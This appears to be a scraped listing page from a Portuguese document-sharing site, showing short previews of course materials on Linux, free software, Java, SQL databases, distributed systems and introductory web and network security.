Prof. Jefferson Costa www.jeffersoncosta.com.br

Prof. Jefferson Costa www.jeffersoncosta.com.br O que é Linux? Open Source (software Livre) é a mesma coisa que Software Gratuito? Quem é melhor? Qual é mais seguro? Encontramos muitas diferenças entre as distribuições de Linux? Posso desinstalar o

Leia mais

Introdução a Informática. Prof.: Roberto Franciscatto

Introdução a Informática. Prof.: Roberto Franciscatto Introdução a Informática Prof.: Roberto Franciscatto 6.1 ARQUIVOS E REGISTROS De um modo geral os dados estão organizados em arquivos. Define-se arquivo como um conjunto de informações referentes aos elementos

Leia mais

Bacharelado em Ciência e Tecnologia Processamento da Informação. Equivalência Portugol Java. Linguagem Java

Bacharelado em Ciência e Tecnologia Processamento da Informação. Equivalência Portugol Java. Linguagem Java Linguagem Java Objetivos Compreender como desenvolver algoritmos básicos em JAVA Aprender como escrever programas na Linguagem JAVA baseando-se na Linguagem Portugol aprender as sintaxes equivalentes entre

Leia mais

Linux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica

Linux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica Linux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica Semana da Informática - Escola Secundária Filipa de Vilhena 27 de Abril de 2004 - Porto Agenda Situação Actual da Utilização Linux

Leia mais

Índice de tabelas. Índice de ilustrações

Índice de tabelas. Índice de ilustrações Bod Garage Todos os direitos reservados Índice Introdução...2 Objetivo geral...8 Procedimentos...8 Referências...9 Índice de tabelas Tabela 1: Maio/2007...3 Tabela 2: Maio/2008...3 Tabela 3: Maio/2009...3

Leia mais

BD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04

BD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04 BD SQL Server SGBD SQL Server Licenciatura em Engenharia Informática e Computação Bases de Dados 2003/04 BD SQL Server Criação da Ligação ao SGBD Entrar no Microsoft SQL Server / Enterprise Manager Criar

Leia mais

Introdução ao Sistema UNIX

Introdução ao Sistema UNIX Volnys & Midorikawa (c) 1 Introdução ao Sistema UNIX Volnys Borges Bernal volnys@lsi.usp.br http://www.lsi.usp.br/~volnys Edson Toshimi Midorikawa emidorik@lsi.usp.br http://www.lsi.usp.br/~emidorik Laboratório

Leia mais

Instalação do IBM SPSS Modeler Server Adapter

Instalação do IBM SPSS Modeler Server Adapter Instalação do IBM SPSS Modeler Server Adapter Índice Instalação do IBM SPSS Modeler Server Adapter............... 1 Sobre a Instalação do IBM SPSS Modeler Server Adapter................ 1 Requisitos de

Leia mais

DSS 09/10. DSS 09/10 Que métodos é que fazem parte de cada camada? Aplicações Multi-camada JDBC. Aula 3 DSS 09/10

DSS 09/10. DSS 09/10 Que métodos é que fazem parte de cada camada? Aplicações Multi-camada JDBC. Aula 3 DSS 09/10 Universidade do Minho Departamento de Informática Aplicações Multi-camada JDBC Aula 3 António Nestor Ribeiro /António Ramires Fernandes/ José Creissac Campos {anr,arf,jose.campos@di.uminho.pt 2 Programação

Leia mais

Unidade 1: Sistema Operativo Linux

Unidade 1: Sistema Operativo Linux Unidade 1: Sistema Operativo Linux 1 2 Sistema Operativo Linux Objectivos desta unidade Caracterizar o sistema operativo Linux Saber como obter documentação e apoio sobre a instalação e utilização do Linux

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:

Leia mais

Senha Admin. Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização

Senha Admin. Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização Manual do Nscontrol Principal Senha Admin Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização Aqui, você poderá selecionar quais programas você quer que

Leia mais

Definições. Parte 02. Java Conceitos e. Desenvolvimento de Programação Orientada a Objetos. Prof. Pedro Neto

Definições. Parte 02. Java Conceitos e. Desenvolvimento de Programação Orientada a Objetos. Prof. Pedro Neto Java Conceitos e Definições Parte 02 Prof. Pedro Neto Aracaju Sergipe - 2011 Conteúdo 2 O que é Java i. Java ii. Máquina Virtual iii. Java lento? Hotspot e JIT iv. Versões do Java e a confusão do Java2

Leia mais

Listando, gravando, alterando e excluindo registro do banco de dados com JSP

Listando, gravando, alterando e excluindo registro do banco de dados com JSP SISTEMAS DE INFORMAÇÃO 3º ANO PROGRAMAÇÃO II PROF. RONALDO FERREIRA DA SILVA JavaServer Pages JavaServer Pages (JSP) é uma tecnologia que ajuda os desenvolvedores de software a criarem páginas web geradas

Leia mais

SISTEMAS OPERACIONAIS DE ARQUITETURA ABERTA

SISTEMAS OPERACIONAIS DE ARQUITETURA ABERTA SISTEMAS OPERACIONAIS DE ARQUITETURA ABERTA Prof. Ulisses Cotta Cavalca Belo Horizonte/MG 2015 1 SUMÁRIO 1. Histórico do sistema operacional 2. Licença de softwares 3. Aspectos

Leia mais

GNU/Linux - Conhecimento e Oportunidades. Agenda Currículo Objetivo GNU/Linux. Free Software e Open Source

GNU/Linux - Conhecimento e Oportunidades. Agenda Currículo Objetivo GNU/Linux. Free Software e Open Source AS2MWPC Agenda Currículo Objetivo GNU/Linux Free Software e Open Source AS2MWPC Agenda (continuação) Estudo de Casos Instituto Dom Bosco AS2MWPC / Projeto Incubadora da FATEC-SP Agregando conhecimento

Leia mais

Banco de Dados. Professor: Rômulo César. romulodandrade@gmail.com www.romulocesar.com.br

Banco de Dados. Professor: Rômulo César. romulodandrade@gmail.com www.romulocesar.com.br Banco de Dados Professor: Rômulo César romulodandrade@gmail.com www.romulocesar.com.br Sistema de arquivos X Sistemas de Banco de Dados Sistema de arquivos Sistema de Banco de Dados Aplicativos Dados (arquivos)

Leia mais

APOSTILA BÁSICA DE MYSQL

APOSTILA BÁSICA DE MYSQL APOSTILA BÁSICA DE MYSQL História O MySQL foi criado na Suécia por dois suecos e um finlandês: David Axmark, Allan Larsson e Michael "Monty" Widenius, que têm trabalhado juntos desde a década de 1980.

Leia mais

Caracterização de Sistemas Distribuídos

Caracterização de Sistemas Distribuídos Aula 1 Caracterização de Sistemas Distribuídos Prof. Dr. João Bosco M. Sobral mail: bosco@inf.ufsc.br - página: http://www.inf.ufsc.br/~bosco Rodrigo Campiolo mail: rcampiol@inf.ufsc.br - página: http://ww.inf.ufsc.br/~rcampiol

Leia mais

O modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre.

O modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre. O modelo Bazar de Produção de Softwares O caso das Comunidades Virtuais de Software livre. Por Vicente Aguiar Fonte: Lucas Rocha Feced/2005 Sobre esta apresentação 2008 Vicente Aguiar

Leia mais

L A M P. Arquitectura Linux, Apache, MySQL, PHP. A m p l i t u d e N e t

L A M P. Arquitectura Linux, Apache, MySQL, PHP. A m p l i t u d e N e t L A M P Arquitectura Linux, Apache, MySQL, PHP A m p l i t u d e N e t A) Arquitectura LAMP A Plataforma UD121 baseia-se na arquitectura LAMP. Este termo surgiu no final do ano 2000 para definir o trabalho

Leia mais

Aplicação web protegida

Aplicação web protegida Sua aplicação web é segura? SEGURANÇA Aplicação web protegida Aplicações web oferecem grandes riscos à segurança. Aprenda a proteger todos os elementos dessa complexa equação. por Celio de Jesus Santos

Leia mais

SQL Structured Query Language

SQL Structured Query Language Janai Maciel SQL Structured Query Language (Banco de Dados) Conceitos de Linguagens de Programação 2013.2 Structured Query Language ( Linguagem de Consulta Estruturada ) Conceito: É a linguagem de pesquisa

Leia mais

Desenvolvimento em Linux. Conceitos básico sobre Desenvolvimento na plataforma Linux. CEFET-PE 19/10/2006

Desenvolvimento em Linux. Conceitos básico sobre Desenvolvimento na plataforma Linux. CEFET-PE 19/10/2006 Conceitos básico sobre Desenvolvimento na plataforma Linux. CEFET-PE 19/10/2006 Agenda Os Primeiros Passos Ferramentas Compiladores Linguagens Ambiente de Desenvolvimento DEMO Quais os primeiros passos?

Leia mais

Programação de Computadores e Robocode. http://www.lac.inpe.br/~rafael.santos

Programação de Computadores e Robocode. http://www.lac.inpe.br/~rafael.santos Programação de Computadores e Robocode 1 O que é Programação de Computadores? O que é um programa de computador? Quem escreve estes programas? Como são escritos? O que podemos fazer com estes programas?

Leia mais

Fundamentos de Ethical Hacking EXIN

Fundamentos de Ethical Hacking EXIN Exame Simulado Fundamentos de Ethical Hacking EXIN Edição Augusto 2015 Copyright 2015 EXIN Todos os direitos reservados. Nenhuma parte desta publicação pode ser publicado, reproduzido, copiado ou armazenada

Leia mais

Processamento Distribuído em Cluster do Tipo Beowulf

Processamento Distribuído em Cluster do Tipo Beowulf UNIVERSIDADE ESTADUAL PAULISTA JULIO DE MESQUITA FILHO FACULDADE DE TECNOLOGIA DA BAIXADA SANTISTA DEPARTAMENTO DE INFORMÁTICA GESTÃO DE NEGÓCIOS Processamento Distribuído em Cluster do Tipo Beowulf ALEXANDRE

Leia mais

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o

Leia mais

Universidade Federal de Juiz de Fora Ciência da Computação Sistemas Distribuídos Professor Ciro Barbosa

Universidade Federal de Juiz de Fora Ciência da Computação Sistemas Distribuídos Professor Ciro Barbosa Universidade Federal de Juiz de Fora Ciência da Computação Sistemas Distribuídos Professor Ciro Barbosa Web Service Plínio Antunes Garcia Sam Ould Mohamed el Hacen Sumário Introdução conceitual O Web Service

Leia mais

Projeto de extensão Linux no Campus

Projeto de extensão Linux no Campus Projeto de extensão Linux no Campus Universidade Federal de Santa Maria Acadêmico do Curso de Sistemas de Informação Evandro Bolzan Contatos: ebolzan@inf.ufsm.br, http://www.inf.ufsm.br/~ebolzan BUG BUG

Leia mais

Ferramentas e Diferentes tipos de Ataques Objetivo: Fundamentar as diferentes técnicas de ataques hackers e suas ferramentas.

Ferramentas e Diferentes tipos de Ataques Objetivo: Fundamentar as diferentes técnicas de ataques hackers e suas ferramentas. 02/12/2014 Tipos de Ataque Segurança em Redes de Computadores Emanuel Rebouças, MBA Disciplina: SEGURANÇA EM REDES DE COMPUTADORES / Módulo: INTRODUÇÃO À SEGURANÇA DA INFORMAÇÃO Copyright 2014 AGENDA Ferramentas

Leia mais

Curso Introdução ao Linux. Desmistificando o Software Livre. Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com.

Curso Introdução ao Linux. Desmistificando o Software Livre. Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com. Curso Introdução ao Linux Desmistificando o Software Livre Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com.br Índice 1 O que é Software Livre? 2 A história por trás do Software Livre.

Leia mais

1 - Introdução. 1.1 - Motivação

1 - Introdução. 1.1 - Motivação 1 - Introdução 1.1 - Motivação Software livre é um tipo de programa desenvolvido por um grupo de pessoas que além de disponibilizar o software gratuitamente, ainda coloca a disposição seu código fonte

Leia mais

Introdução Software Livre Projeto GNU/Linux Software Livre vs Software Proprietário Liberdade para todos. Software Livre. Grupo 5

Introdução Software Livre Projeto GNU/Linux Software Livre vs Software Proprietário Liberdade para todos. Software Livre. Grupo 5 Introdução Projeto GNU/Linux vs Software Proprietário Liberdade para todos Tronco Inicial Universidade Federal de Alagoas - UFAL- Arapiraca 29 de Março 2012 Introdução Projeto GNU/Linux vs Software Proprietário

Leia mais

XSS - CROSS-SITE SCRIPTING

XSS - CROSS-SITE SCRIPTING Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente

Leia mais

Java TM e o Modelo de Objetos

Java TM e o Modelo de Objetos Java TM e o Modelo de Objetos Java Deployment Course: Aula 1 por Jorge H C Fernandes (jorge@dimap.ufrn.br) DIMAp-UFRN Java e o Modelo de Objetos Objetivos desta Aula Introduzir conceitos básicos do modelo

Leia mais

Sistema Operativo Linux

Sistema Operativo Linux Sistema Operativo Linux Linux É um sistema operativo da família UNIX, desenvolvido colaborativamente através da internet. É um software livre ou open source, com o código fonte disponível em www.kernel.org

Leia mais

Triggers e mais... Instituto Militar de Engenharia IME 1o. Semestre/2005 Triggers Propósito mais amplo que restrições Restrições onde se explicita o evento Regras event-condition-action (ECA) Eventos:

Leia mais

genérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes

genérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes FIREWALLS Firewalls Definição: Termo genérico utilizado para designar um tipo de proteção de rede que restringe o acesso a certos serviços de um computador ou rede de computadores pela filtragem dos pacotes

Leia mais